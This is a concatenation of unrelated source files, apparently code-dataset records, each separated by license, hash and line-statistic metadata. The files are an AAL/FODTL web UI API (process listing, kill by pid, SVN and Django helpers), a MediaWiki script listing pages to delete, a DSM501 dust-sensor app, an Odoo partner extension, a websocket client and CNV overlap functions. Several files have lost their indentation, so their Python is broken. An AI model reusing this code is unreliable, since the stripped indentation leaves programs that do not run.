mm = aalc(base_dir + "/" + f, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
except:
# Compilation Error
return '{"agents" : [], "services" : [], "types" : [], "data" : [], "clauses" : [], "dataTypes" : [], "actorTypes" : []}'
agents = ",".join(mm.get_declared(dtype="agents"))
services = ",".join(mm.get_declared(dtype="services"))
data = ",".join(mm.get_declared(dtype="data"))
tts = mm.aalprog.get_declared(m_type)
types = ",".join(mm.get_declared(dtype="types"))
# Filter by data type / actor type
actorTypes = ",".join(['"' + str(x.name) + '"' for x in list(filter(lambda x: x.subtype_of("Actor"), tts))])
dataTypes = ",".join(['"' + str(x.name) + '"' for x in list(filter(lambda x: x.subtype_of("data"), tts))])
clauses = ",".join(['"' + str(x.name) + '"' for x in mm.aalprog.clauses])
res = '{"agents" : [' + agents + '], "services" : [' + services + '], "types" : [' + \
types + '], "data" : [' + data + '], "clauses" : [' + clauses + ']' + ', "dataTypes" : [' +\
dataTypes + ']' + ', "actorTypes" : [' + actorTypes + ']' + '}'
return res
# Get ps info
def api_monitor():
# ps -a -o user,pid,%cpu,%mem,start,time,command
p = Popen(['ps', '-aL', '-o', 'user,pid,%cpu,%mem,time,command'], stdout=PIPE, stderr=PIPE, stdin=PIPE)
sts = p.stdout.read().decode("utf-8")
sts = sts.split("\n")
sts2 = [' '.join(x.split()) for x in sts][1:]
pss = ""
for x in sts2:
x = x.split(" ")
if len(x) >= 5:
cmd = ' '.join(x[5:])
if is_cmd_allowed(cmd):
pss += (
"{"
" \"user\": \"" + x[0] + "\","
" \"pid\" : \"" + x[1] + "\","
" \"cpu\" : \"" + x[2] + "\","
" \"mem\" : \"" + x[3] + "\","
" \"time\": \"" + x[4] + "\","
" \"cmd\" : \"" + cmd + "\" "
"},"
)
pss = pss[:-1]
json = "{\"ps\" : [ " + pss + " ]}"
return json
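# Illustrative sketch (standalone): the same process listing built with
# json.dumps instead of manual string concatenation, which keeps the JSON valid
# even when a command line contains quotes; the is_cmd_allowed filter used
# above is omitted here for brevity.
import json
from subprocess import Popen, PIPE
def _demo_monitor():
    p = Popen(['ps', '-aL', '-o', 'user,pid,%cpu,%mem,time,command'], stdout=PIPE, stderr=PIPE, stdin=PIPE)
    rows = []
    for line in p.stdout.read().decode("utf-8").splitlines()[1:]:
        cols = line.split(None, 5)  # at most 6 fields, spaces kept inside the command
        if len(cols) == 6:
            user, pid, cpu, mem, time_, cmd = cols
            rows.append({"user": user, "pid": pid, "cpu": cpu, "mem": mem, "time": time_, "cmd": cmd})
    return json.dumps({"ps": rows})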
# kill process by id
def api_kill_ps(pid):
p = Popen(['kill', '-KILL', pid], stdout=PIPE, stderr=PIPE, stdin=PIPE)
return p.stdout.read().decode("utf-8")
# Macro API
def api_macro_call(f, macro_name, macro_args):
res = ""
try:
res = aalc(base_dir + "/" + f, libs_path="libs/aal/", root_path="", web=True)
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
res["mm"].call(macro_name, macro_args[1:-1].split(','))
res = reportSIO.getvalue() + "\n" + reportEIO.getvalue()
# Restore context
sys.stdout = sysout
sys.stderr = syserr
except Exception as e:
res = "Compilation Error : " + str(e)
print(res)
res = to_html_colors(res)
return res.replace("\n", "<br>")
# Gen accmon
def api_gen_accmon(file, spec):
try:
mspec = MappingSpec()
tmp = spec.split(";")
for x in tmp:
tmp2 = x.split(":")
if len(tmp2) > 1:
args = tmp2[1].split("=>")
if tmp2[0] == "clause":
if len(args) > 2:
mspec.clauses.append(MappingSpec.ClauseMap(args[0], args[1], args[2]))
elif tmp2[0] == "service":
if len(args) > 1:
mspec.services.append(MappingSpec.ServiceMap(args[0], args[1]))
elif tmp2[0] == "agent":
if len(args) > 1:
mspec.agents.append(MappingSpec.AgentMap(args[0], args[1]))
elif tmp2[0] == "type":
if len(args) > 1:
mspec.types.append(MappingSpec.TypeMap(args[0], args[1]))
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
res = AALtoDJFODTLMON(mm, mspec)
file_name = file.replace('.aal', '_rules.py')
api_write_file(file_name, res)
return file_name
except:
# Compilation Error
return 'Error'
# Generate django app skeleton
def api_generate_django(aal_file, spec_file, output_folder):
return generate_django_skeleton(aal_file, spec_file, output_folder)
# Run django app
def api_run_django(app, port=9000):
p = Popen(['python3', base_dir + "/"+app, 'migrate'], stdout=PIPE, stderr=PIPE, stdin=PIPE)
# p = Popen(['python3', base_dir + "/"+app, 'runserver', str(port)], stdout=PIPE, stderr=PIPE, stdin=PIPE)
# IMPORTANT: Run the server using non blocking IO in order to capture errors and show them to the client
from queue import Queue, Empty
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, err, queue):
for line in iter(out.readline, b''):
queue.put(line.decode("utf-8"))
out.close()
for line in iter(err.readline, b''):
queue.put(line.decode("utf-8"))
err.close()
p = Popen(['python3', base_dir + "/"+app, 'runserver', str(port)], stdout=PIPE, stderr=PIPE, stdin=PIPE,
bufsize=1, close_fds=ON_POSIX)
q = Queue()
t = Thread(target=enqueue_output, args=(p.stdout, p.stderr, q))
t.daemon = True
t.start()
# Wait to get some data
sleep(5)
# Get output
items = []
max = 100
for numOfItemsRetrieved in range(0, max):
try:
if numOfItemsRetrieved == max:
break
items.append(q.get_nowait())
except Exception:
break
print("=====================================")
print("".join(items))
print("=====================================")
return "".join(items).replace("\n", "<br>")
# Convert Fodtl formula to vFodtl diagram
def api_fodtl_to_vfodtl(formula):
print(formula)
try:
from fodtlmon.parser.Parser import FodtlParser
except:
return "fodtlmon is not installed !"
try:
def prg(formula):
res = ""
js_class = "Fodtl_%s" % formula.__class__.__name__.lower()
if isinstance(formula, Predicate):
arguments = []
for x in formula.args:
arguments.append(prg(x))
res = '{ "%s": [%s] }' % (js_class, ",".join(arguments))
elif isinstance(formula, Constant):
res = '{ "%s": {"Fodtl_value": "%s"} }' % (js_class, formula.name)
elif isinstance(formula, Variable):
res = '{ "%s": {"Fodtl_value": "%s"} }' % (js_class, formula.name)
elif isinstance(formula, At):
pass
elif isinstance(formula, Forall):
pass
elif isinstance(formula, Exists):
pass
elif isinstance(formula, true) or isinstance(formula, false):
res = '{ "%s": "" }' % js_class
elif isinstance(formula, UExp):
inner = prg(formula.inner)
res = '{"%s" : %s}' % (js_class, inner)
elif isinstance(formula, BExp):
exp1 = prg(formula.left)
exp2 = prg(formula.right)
res = '{ "%s" : [%s, %s] }' % (js_class, exp1, exp2)
else:
raise Exception("Error %s of type %s" % (formula, type(formula)))
return res
f = FodtlParser.parse(formula)
res = prg(f)
return res
except Exception as e:
return "%s" % e
# Register formula in accmon
def api_register_accmon_monitor(formula, mon_name, accmon_url):
import urllib.request, urllib.parse
res = "Error"
values = {'formula_id': mon_name, 'formula': formula}
data = urllib.parse.urlencode(values)
data = data.encode('ascii') # data should be bytes
url = accmon_url + "/sysmon/remote/register_formula/"
with urllib.request.urlopen(url, data) as response:
res = str(response.read())
print(res)
return res
# Transform a clause into Fodtl formula
def api_clause_to_fodtl(file, clause):
res = "Error"
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
if mm is not None:
c = mm.clause(clause)
if c is not None:
res = aal_clause_to_fodtl(c)
return res
# Check and update the corresponding acd/aal file
def check_aal_acd(file):
def get_clause_node_from_json(acd, clause):
for x in acd:
if x["type"] == "PolicyUI":
c_name = re.search(r'CLAUSE \w+', x["policy"]).group(0).replace("CLAUSE ", "")
if c_name == clause:
return x
return None
ext = file.split(".")[-1]
if ext == "acd":
# Check acd file
aal_file_name = base_dir+"/"+file.replace(".acd", ".aal")
acd_file_name = base_dir+"/"+file
if os.path.isfile(aal_file_name): # The corresponding aal file exists
acd_file = ""
aal_file = ""
# Read acd and aal files
with open(acd_file_name, "r") as f:
acd_file = json.loads(f.read())
with open(aal_file_name, "r") as f:
aal_file = f.read()
mm = aalc(aal_file_name, libs_path="libs/aal/", root_path="", no_exec=True, web=False)["mm"]
if mm is not None:
inputfile = FileStream(aal_file_name)
# Update aal file
for x in acd_file:
if x["type"] == "PolicyUI":
clause_name = re.search(r'CLAUSE \w+', x["policy"]).group(0)
if clause_name not in aal_file: # Add the clause in the aal file
aal_file += "\n" + x["policy"]
else: # Update the clause
cl = mm.clause(clause_name.replace("CLAUSE ", ""))
if cl is not None:
rng = cl.source_range
original_clause = inputfile.getText(rng[0], rng[1])
if x["policy"] != original_clause:
aal_file = aal_file.replace(original_clause, x["policy"])
# TODO remove deleted clause
# Save aal file
with open(aal_file_name, "w") as f:
f.write(aal_file)
elif ext == "aal":
# Check aal file
aal_file_name = base_dir+"/"+file
acd_file_name = base_dir+"/"+file.replace(".aal", ".acd")
if os.path.isfile(acd_file_name): # The corresponding acd file exists
acd_file = ""
aal_file = ""
# Read acd and aal files
with open(acd_file_name, "r") as f:
acd_file = json.loads(f.read())
with open(aal_file_name, "r") as f:
aal_file = f.read()
mm = aalc(aal_file_name, libs_path="libs/aal/", root_path="", no_exec=True, web=False)["mm"]
if mm is not None:
inputfile = FileStream(aal_file_name)
# Update acd file
for x in mm.aalprog.clauses:
c = get_clause_node_from_json(acd_file, str(x.name))
if c is not None:
rng = x.source_range
original_clause = inputfile.getText(rng[0], rng[1])
if c["policy"] != original_clause:
c["policy"] = original_clause
# Save acd file
with open(acd_file_name, "w") as f:
json.dump(acd_file, f)
# SVN
def svn_init():
if not os.path.isdir(".workspace"):
print(" - Creating svn repo at .workspace")
p = Popen(['svnadmin', "create", ".workspace"])
p.wait()
svn_path = "file://%s" % os.path.realpath(__file__).replace("ui/api.py", ".workspace")
p = Popen(['svn', "import", base_dir + "/", svn_path, "-m", "'Initial commit'"])
p.wait()
p = Popen(['svn', "checkout", "--force", svn_path, base_dir + "/"])
p.wait()
# Svn log
def svn_log(target):
p = Popen(['svn', "up", base_dir + "/"])
p.wait()
p = Popen(['svn', "log", base_dir + "/" + target, "--xml"], stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.wait()
log = p.stdout.read().decode("utf-8")
return log
# Svn revert
def svn_revert(target, version):
p = Popen(['svn', "merge", "-r", "HEAD:%s" % version, "%s" % target], cwd=base_dir+'/')
p.wait()
p = Popen(['svn', "commit", "-m", "Rolled back to r%s" % version, "%s/%s" % (base_dir, target)], stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.wait()
log = p.stdout.read().decode("utf-8")
return log
# Svn diff
def svn_diff(target, r1, r2):
print("%s %s" % (r1, r2))
try:
r1 = int(r1)
r2 = int(r2)
except:
r1 = 1
r2 = 1
r1 = r1 if r1 >= 1 else 1
r2 = r2 if r2 >= 1 else 1
# p = Popen(['svn', "up", base_dir + "/"])
# p.wait()
p = Popen(['svn', "diff", base_dir + "/" + target, "-r", "%s:%s" %(r1, r2)], stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.wait()
log = p.stdout.read().decode("utf-8").replace("\n", "<br>")
return log
# Fodtlmon web service
def start_fodtlmon_server(server_port=9999):
import os
from subprocess import Popen
    Popen(['python3', 'ui/mon.py', str(server_port)])
sleep(1)
return server_port
# Translate AAL clause to FODTL
def aal_to_fodtl(file, clause):
res = "Error"
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
if mm is not None:
c = mm.clause(clause)
if c is not None:
res = aal_clause_to_fodtl(c)
return res
# Get AAL behaviors
def get_aal_behaviors(file):
from simul.SimulGenerator import m_behavior_to_behavior
import json
res = []
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
if mm is not None:
behaviors = mm.aalprog.get_behaviors()
for b in behaviors:
res.append(json.dumps(m_behavior_to_behavior(b, b.name).to_json()))
return json.dumps(res)
|
gpl-3.0
| 3,545,888,401,039,262,700
| 31.777618
| 138
| 0.521404
| false
| 3.387604
| false
| false
| false
|
remiscarlet/RandomKCWikiScripts
|
kcwiki-web/kcwiki/Python Scripts/mw-scripts/mediawikinuker.py
|
1
|
1857
|
# -*- coding: UTF-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import requests
import re
import os
from lxml import etree
fileLoc = os.path.join("/","Users","YutoTakamoto","Dropbox","YutoProgramming","python","pagesToNuke.txt")
baseURL = "http://en.kancollewiki.net/api.php?"
searchSize = 50
searchParams = ["@comment"]
searchProps = ["timestamp","wordcount","size"]
nameSpaces = ["1","201","203"]
wordSizeLimit = 1000
totalHits = 0
reason = "Deleting clutter."
params = {
"action":"query",
"list":"search",
"srsearch":"+".join(searchParams),
"srprop":"|".join(searchProps),
"srnamespace":"|".join(nameSpaces),
"srlimit":str(searchSize),
"sroffset":"0",
"format":"xml"
}
class HitsParser(object):
def start(self, tag, attrib):
if (tag == "searchinfo"):
self.totalHits = attrib["totalhits"]
def close(self):
pass
class Parser(object):
def start(self, tag, attrib):
if (tag == "p"):
if attrib["size"].isdigit() and attrib["wordcount"].isdigit():
if int(attrib["wordcount"])<wordSizeLimit:
# pass
self.file.write(attrib["title"]+"|"+self.reason+"\n")
#print attrib
def close(self):
pass
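# Illustrative sketch (standalone, not part of the original script): the lxml
# "target parser" protocol used by HitsParser and Parser above, on a tiny
# inline document; etree.XML() returns whatever the target's close() returns.
from lxml import etree
class DemoTarget(object):
    def __init__(self):
        self.titles = []
    def start(self, tag, attrib):
        if tag == "p":
            self.titles.append(attrib.get("title"))
    def close(self):
        return self.titles
demoParser = etree.XMLParser(target = DemoTarget())
print(etree.XML('<api><p title="Page1"/><p title="Page2"/></api>', demoParser))  # ['Page1', 'Page2']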
url = baseURL
for param,val in params.items():
url+="&"+param+"="+val
request = requests.get(url)
f = open(fileLoc,"w")
hitParser = etree.XMLParser(target = HitsParser())
result = etree.XML(request.text,hitParser)
totalHits = int(hitParser.target.totalHits)
print totalHits
parser = etree.XMLParser(target = Parser())
parser.target.file = f
parser.target.reason = reason
etree.XML(request.text,parser)
totalHits = totalHits if totalHits<5000 else 5000
for offset in xrange(0,totalHits,searchSize):
#break
params["sroffset"] = str(offset)
url = baseURL
for param,val in params.items():
url+="&"+param+"="+val
print url
req = requests.get(url)
etree.XML(req.text,parser)
parser.target.file.close()
|
gpl-2.0
| -545,714,957,443,156,200
| 23.434211
| 105
| 0.690361
| false
| 2.906103
| false
| false
| false
|
t3dev/odoo
|
addons/website/models/res_partner.py
|
1
|
2246
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import werkzeug
from odoo import api, models
def urlplus(url, params):
return werkzeug.Href(url)(params or None)
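# Illustrative usage sketch (not part of the Odoo module): urlplus simply lets
# werkzeug.Href append the params dict as a query string; assumes a werkzeug
# version that still exposes Href at the top level, as used above.
_demo_url = urlplus('https://maps.google.com/maps', {'q': 'Paris, France', 'z': 10})
# _demo_url is e.g. 'https://maps.google.com/maps?q=Paris%2C+France&z=10'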
class Partner(models.Model):
_name = 'res.partner'
_inherit = ['res.partner', 'website.published.multi.mixin']
@api.multi
def google_map_img(self, zoom=8, width=298, height=298):
google_maps_api_key = self.env['website'].get_current_website().google_maps_api_key
if not google_maps_api_key:
return False
params = {
'center': '%s, %s %s, %s' % (self.street or '', self.city or '', self.zip or '', self.country_id and self.country_id.display_name or ''),
'size': "%sx%s" % (width, height),
'zoom': zoom,
'sensor': 'false',
'key': google_maps_api_key,
}
return urlplus('//maps.googleapis.com/maps/api/staticmap', params)
@api.multi
def google_map_link(self, zoom=10):
params = {
'q': '%s, %s %s, %s' % (self.street or '', self.city or '', self.zip or '', self.country_id and self.country_id.display_name or ''),
'z': zoom,
}
return urlplus('https://maps.google.com/maps', params)
@api.multi
def _get_name(self):
name = super(Partner, self)._get_name()
if self._context.get('display_website') and self.env.user.has_group('website.group_multi_website'):
if self.website_id:
name += ' [%s]' % self.website_id.name
return name
def _compute_display_name(self):
self2 = self.with_context(display_website=False)
super(Partner, self2)._compute_display_name()
# onchange uses the cache to retrieve value, we need to copy computed_value into the initial env
for record, record2 in zip(self, self2):
record.display_name = record2.display_name
@api.multi
def get_base_url(self):
"""When using multi-website, we want the user to be redirected to the
most appropriate website if possible."""
res = super(Partner, self).get_base_url()
return self.website_id and self.website_id._get_http_domain() or res
|
gpl-3.0
| -4,205,987,540,885,179,000
| 36.433333
| 149
| 0.600178
| false
| 3.587859
| false
| false
| false
|
Sirs0ri/PersonalAssistant_Interfaces
|
interface/__main__.py
|
1
|
4508
|
"""Starts the main interface. To be called with 'python interface'
from the root folder. After importing it, the interface will be
started start"""
import logging
import logging.handlers
import Queue
import socket
import sys
from autobahn.twisted.websocket import WebSocketClientProtocol, \
WebSocketClientFactory
from twisted.internet import reactor
import logger
import basic_interface as interface
# if "--localhost" in sys.argv or "-L" in sys.argv:
# IP = "127.0.0.1"
# else:
# IP = "192.168.178.46"
logger.initialize()
LOGGER = logging.getLogger(__name__)
def wait_for_server_ip():
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(30)
# Bind the socket to the port
server_address = ('', 10000)
LOGGER.info('starting up on %s port %s',
server_address[0],
server_address[1])
interface.print_msg("Waiting for a broadcast from the server.")
sock.bind(server_address)
# expects (host, port) as arg, two brackets are on purpose
data = None
try:
LOGGER.info('waiting to receive message')
# TODO: This fails in bash if the port isn't explicitly opened
data, address = sock.recvfrom(4096)
LOGGER.info('received %d bytes from %s', len(data), address)
LOGGER.info(data)
interface.print_msg('Received %s from %s' % (data, address))
if data:
sock.sendto("I'll connect!", address)
finally:
sock.close()
if data and data.split(":")[0] == "sam.ip.broadcast":
ip, port = address[0], int(data.split(":")[1])
LOGGER.info("Used the broadcasted IP.")
interface.print_msg("Used the broadcasted IP.")
else:
ip, port = None, None
LOGGER.info("No broadcast received.")
interface.print_msg("No broadcast received.")
return ip, port
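# Illustrative sketch (not part of the original interface): what a matching
# announcement from the server side could look like; the "sam.ip.broadcast:<port>"
# payload and the discovery port 10000 are taken from the parsing above, the
# rest is an assumption.
def _demo_announce(ws_port=19113):
    announce_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    announce_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    # Broadcast the websocket port to anyone listening on the discovery port.
    announce_sock.sendto("sam.ip.broadcast:%d" % ws_port, ("<broadcast>", 10000))
    announce_sock.close()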
class Interface(WebSocketClientProtocol):
def onConnect(self, response):
LOGGER.info("Server connected: %s", response.peer)
interface.on_connect(response)
def onOpen(self):
LOGGER.info("Connection open.")
# self.sendMessage(u"Hello, world!".encode('utf8'))
# TODO Put some kind of authentication here
interface.on_open(COMMANDS)
def sendInput():
try:
val = COMMANDS.get(timeout=0.1)
except Queue.Empty:
val = None
if val == "exit":
interface.on_exit()
self.sendClose()
elif val is not None:
self.sendMessage(val.encode('utf8'))
interface.message_sent(val)
if val == "exit_server":
interface.on_exit()
self.sendClose()
# TODO: Close when the server closed the connection
if self.state is self.STATE_OPEN:
self.factory.reactor.callLater(0.01, sendInput)
self.factory.reactor.callLater(0.01, sendInput)
def onMessage(self, payload, isBinary):
interface.on_message(payload, isBinary)
if isBinary:
LOGGER.info("Binary message received: %d", len(payload))
else:
LOGGER.info("Text message received: %s", payload.decode('utf8'))
def onClose(self, wasClean, code, reason):
LOGGER.warn("The connection has been ended.")
# self.sendClose()
if reason:
LOGGER.info(reason)
interface.on_close(wasClean, code, reason)
reactor.stop()
if __name__ == '__main__':
# TODO: Establish conection separately.
LOGGER.debug("-"*79)
LOGGER.debug("Starting Interface")
LOGGER.debug("-"*79)
interface.start()
COMMANDS = Queue.PriorityQueue()
factory = WebSocketClientFactory()
factory.protocol = Interface
if "--localhost" in sys.argv or "-L" in sys.argv:
ip, port = "127.0.0.1", 19113
LOGGER.info("Used the local IP as requested per commandline-arg.")
interface.print_msg(
"Used the local IP as requested per commandline-arg.")
else:
ip, port = wait_for_server_ip()
if ip:
reactor.connectTCP(ip, port, factory)
reactor.run()
else:
interface.on_close(False, None, "No Server found.")
|
mit
| -3,016,389,696,744,748,000
| 30.305556
| 76
| 0.600266
| false
| 4.028597
| false
| false
| false
|
jithinbp/SEELablet-apps
|
seel_res/GUI/E_MISCELLANEOUS/A_Add-ons/DUST_SENSOR.py
|
1
|
4615
|
#!/usr/bin/python
from __future__ import print_function
from SEEL_Apps.utilitiesClass import utilitiesClass
from templates import ui_dsm501 as dsm501
import numpy as np
from PyQt4 import QtGui,QtCore
import sys,time
params = {
'image' : 'DSM501.png',
'helpfile': 'http://www.takingspace.org/make-your-own-aircasting-particle-monitor/',
'name':'Dust Sensor\nDSM501',
'hint':'''
Study the concentration of PM2.5 particles over time using a DSM501/PPD42NS sensor. Connect PIN2 of the sensor to ID1, PIN3 to 5V, PIN5 to GND
'''
}
class AppWindow(QtGui.QMainWindow, dsm501.Ui_MainWindow,utilitiesClass):
def __init__(self, parent=None,**kwargs):
super(AppWindow, self).__init__(parent)
self.setupUi(self)
self.I=kwargs.get('I',None)
self.setWindowTitle(self.I.H.version_string+' : '+params.get('name','').replace('\n',' ') )
self.plot1=self.add2DPlot(self.plot_area)
labelStyle = {'color': 'rgb(255,255,255)', 'font-size': '11pt'}
self.plot1.setLabel('bottom','Time -->', units='S',**labelStyle)
self.plot1.getAxis('left').setLabel('Concentration -->>', color='#ffffff')
self.plot1.setLimits(xMin=0,yMin=0)
self.total_samples = 100
self.acquired_samples = 0
self.timegap = 10 #mS
self.sampling_time = 2000 #mS
self.timer2 = QtCore.QTimer()
self.timer2.timeout.connect(self.updateProgress)
self.timer2.start(500)
self.I.set_state(SQR1=True)
self.curve = self.addCurve(self.plot1,'Concentration')
self.resultsTable.setRowCount(self.total_samples)
self.resultsTable.setColumnCount(3)
self.resultsTable.setHorizontalHeaderLabels(['time','Occupancy %','Concentration mg/m^3'])
self.running=False
self.start_time = time.time()
self.samplingStartTime=time.time()
self.timer = self.newTimer()
#self.running=True
#self.timer.singleShot(0,self.run)
self.X=[]
self.Y=[]
def start(self):
self.X=[]
self.Y=[]
self.running = True
self.timer.singleShot(0,self.run)
def stop(self):
self.running=False
def updateProgress(self):
if not self.running:return
val = 1e5*(time.time()-self.samplingStartTime)/(self.sampling_time)
self.timeProgressBar.setValue(val)
def run(self):
if not self.running:return
self.samplingStartTime = time.time()
self.sampling_time = self.integrationBox.value()*1e3 #convert to mS
self.I.start_one_channel_LA(channel='ID1',channel_mode=1,trigger_mode=0) #every edge
if self.running: self.timer.singleShot(self.sampling_time,self.plotData)
def plotData(self):
if not self.running:return
a,b,c,d,e = self.I.get_LA_initial_states()
if a==self.I.MAX_SAMPLES/4: a = 0
tmp = self.I.fetch_long_data_from_LA(a,1)
print (a,b,c,d,e,tmp)
self.I.dchans[0].load_data(e,tmp)
#print (self.I.dchans[0].timestamps,self.I.dchans[0].initial_state)
stamps = self.I.dchans[0].timestamps
if len(stamps)>2:
if not self.I.dchans[0].initial_state:
stamps = stamps[1:] - stamps[0]
diff = np.diff(stamps)
lows = diff[::2]
highs = diff[1::2]
#print(stamps,sum(lows),sum(highs))
low_occupancy = 100*sum(lows)/stamps[-1] #Occupancy ratio
self.progressBar.setValue(low_occupancy)
concentration = 1.1*pow(low_occupancy,3)-3.8*pow(low_occupancy,2)+520*low_occupancy+0.62; #From the spec sheet curve
self.X.append(time.time()-self.start_time)
self.Y.append(concentration)
self.curve.setData(self.X,self.Y)
item = QtGui.QTableWidgetItem();item.setText('%s'%(time.strftime("%H:%M:%S %d-%h")));self.resultsTable.setItem(self.acquired_samples, 0, item);#item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsEnabled)
item = QtGui.QTableWidgetItem();item.setText('%.3f'%(low_occupancy));self.resultsTable.setItem(self.acquired_samples, 1, item);#item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsEnabled)
item = QtGui.QTableWidgetItem();item.setText('%.3f'%(concentration));self.resultsTable.setItem(self.acquired_samples, 2, item);#item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsEnabled)
self.acquired_samples +=1
if self.acquired_samples==self.total_samples:
self.total_samples = self.acquired_samples+10
self.resultsTable.setRowCount(self.total_samples)
if self.running: self.timer.singleShot(self.timegap,self.run)
def saveData(self):
self.saveDataWindow([self.curve],self.plot1)
def closeEvent(self, event):
self.timer.stop()
self.finished=True
self.running = False
def __del__(self):
self.timer.stop()
print ('bye')
if __name__ == "__main__":
from SEEL import interface
app = QtGui.QApplication(sys.argv)
myapp = AppWindow(I=interface.connect())
myapp.show()
sys.exit(app.exec_())
|
gpl-3.0
| -4,322,714,388,244,980,700
| 34.5
| 212
| 0.711376
| false
| 2.75358
| false
| false
| false
|
bjtrost/TCAG-WGS-CNV-workflow
|
functions.py
|
1
|
5027
|
import sys
##########
#sort
def sort_list(x,y):
return cmp(x,y)
##########
#code to calculate reciprocal overlap
def reciprocal_overlap(s_1,e_1,s_2,e_2):
if s_2 > e_1 or s_1 > e_2:
return [0,0]
else:
#get the smaller start
if s_2 >=s_1:
o_start = s_2
else:
o_start = s_1
#get the smaller end
if e_2 >= e_1:
o_end = e_1
else:
o_end = e_2
#calculate length of call and length of overlap
s1_len = e_1 - s_1
s2_len = e_2 - s_2
o_len = o_end - o_start
if 100 * o_len / (s1_len * 1.0) < 0 or 100 * o_len / (s2_len * 1.0) < 0:
print "s_1: ", s_1, "e_1: ",e_1, "s_2:", s_2, "e_2:", e_2, "o_start:", o_start, "o_end:", o_end
print "s1_len: ", s1_len, "s2_len: ", s2_len, " o_len: ", o_len, "% s1 length overlap: ", 100 * o_len / (s1_len * 1.0), "% s2 length overlap: ", 100 * o_len / (s2_len * 1.0)
sys.exit(0)
#return the percent overlap
return [100 * o_len / (s1_len * 1.0),100 * o_len / (s2_len * 1.0)]
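#Illustrative worked example (standalone, mirrors the arithmetic above):
#intervals [100, 200] and [150, 300] share [150, 200], i.e. 50 units, which is
#50/100 = 50% of the first interval and 50/150 ~ 33.3% of the second, so
#reciprocal_overlap(100, 200, 150, 300) returns [50.0, 33.33...]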
##########
#merge overlapping regions into cluster, note that the start and end of the cluster are trimmed
def cluster(o_data,c_data,ref_start,ref_end):
START = 0
END = 0
clusterString = ""
#for all regions
for data in o_data:
start = data[0]
end = data[1]
region = `start`+"-"+`end`+","
if START == 0 and END == 0:
START = start
END = end
clusterString += region
continue
elif start <= END:
clusterString += region
#now we have a new cluster end
if end > END:
END = end
#region doesn't overlap with the cluster
else:
if START < ref_start:
START = ref_start
if END > ref_end:
END = ref_end
c_data.append([START,END])
#start new cluster
clusterString = region
START = start
END = end
#the last cluster details
if clusterString != "":
if START < ref_start:
START = ref_start
if END > ref_end:
END = ref_end
c_data.append([START,END])
##########
#merge overlapping regions into cluster, no start and end cluster trimming
def alt_cluster(o_data,c_data):
START = 0
END = 0
clusterString = ""
#for all regions
for data in o_data:
start = data[0]
end = data[1]
region = `start`+"-"+`end`+","
if START == 0 and END == 0:
START = start
END = end
clusterString += region
continue
elif start <= END:
clusterString += region
#now we have a new cluster end
if end > END:
END = end
#region doesn't overlap with the cluster
else:
c_data.append([START,END])
#start new cluster
clusterString = region
START = start
END = end
#the last cluster details
if clusterString != "":
c_data.append([START,END])
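##########
#Illustrative sketch (standalone, not part of the original module): the same
#merge-overlapping-intervals idea as cluster/alt_cluster above, in compact form
def demo_merge(intervals):
    merged = []
    for start, end in sorted(intervals):
        if merged and start <= merged[-1][1]:
            #extend the current cluster
            merged[-1][1] = max(merged[-1][1], end)
        else:
            #start a new cluster
            merged.append([start, end])
    return merged
#demo_merge([[1, 5], [4, 10], [12, 15]]) == [[1, 10], [12, 15]]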
##########
#code to calculate overlap
def overlap(s_1,e_1,s_2,e_2):
if s_2 > e_1 or s_1 > e_2:
return [0,0]
else:
#get the smaller start
if s_2 >=s_1:
o_start = s_2
else:
o_start = s_1
#get the smaller end
if e_2 >= e_1:
o_end = e_1
else:
o_end = e_2
#calculate length of call and length of overlap
s1_len = e_1 - s_1
s2_len = e_2 - s_2
o_len = o_end - o_start
if 100 * o_len / (s1_len * 1.0) < 0 or 100 * o_len / (s2_len * 1.0) < 0:
print "s_1: ", s_1, "e_1: ",e_1, "s_2:", s_2, "e_2:", e_2, "o_start:", o_start, "o_end:", o_end
print "s1_len: ", s1_len, "s2_len: ", s2_len, " o_len: ", o_len, "% s1 length overlap: ", 100 * o_len / (s1_len * 1.0), "% s2 length overlap: ", 100 * o_len / (s2_len * 1.0)
sys.exit(0)
        #return the overlap boundary
return [o_start,o_end]
##########
#find overlap between list of intervals and the region
def find_overlap(intervals,start,end):
boundaries = []
c_boundaries = []
for i in intervals:
ovlp = overlap(i[0],i[1],start,end)
if ovlp == [0,0]:
continue
else:
boundaries.append(ovlp)
boundaries.sort(sort_list)
cluster(boundaries,c_boundaries,start,end)
covered = 0
for c in c_boundaries:
covered += c[1]-c[0]+1
return (covered/((end-start+1)*1.0))*100
##########
#find overlap between list of calls and the region
def find_overlap_calls(calls,start,end):
boundaries = []
c_boundaries = []
for i in calls:
ovlp = overlap(i.get_start(),i.get_end(),start,end)
if ovlp == [0,0]:
continue
else:
boundaries.append(ovlp)
boundaries.sort(sort_list)
cluster(boundaries,c_boundaries,start,end)
covered = 0
for c in c_boundaries:
covered += c[1]-c[0]+1
return (covered/((end-start+1)*1.0))*100
|
mit
| -8,482,681,232,780,927,000
| 27.089385
| 179
| 0.509051
| false
| 3.072738
| false
| false
| false
|
kdart/pycopia
|
setup.py
|
1
|
8604
|
#!/usr/bin/python2.7
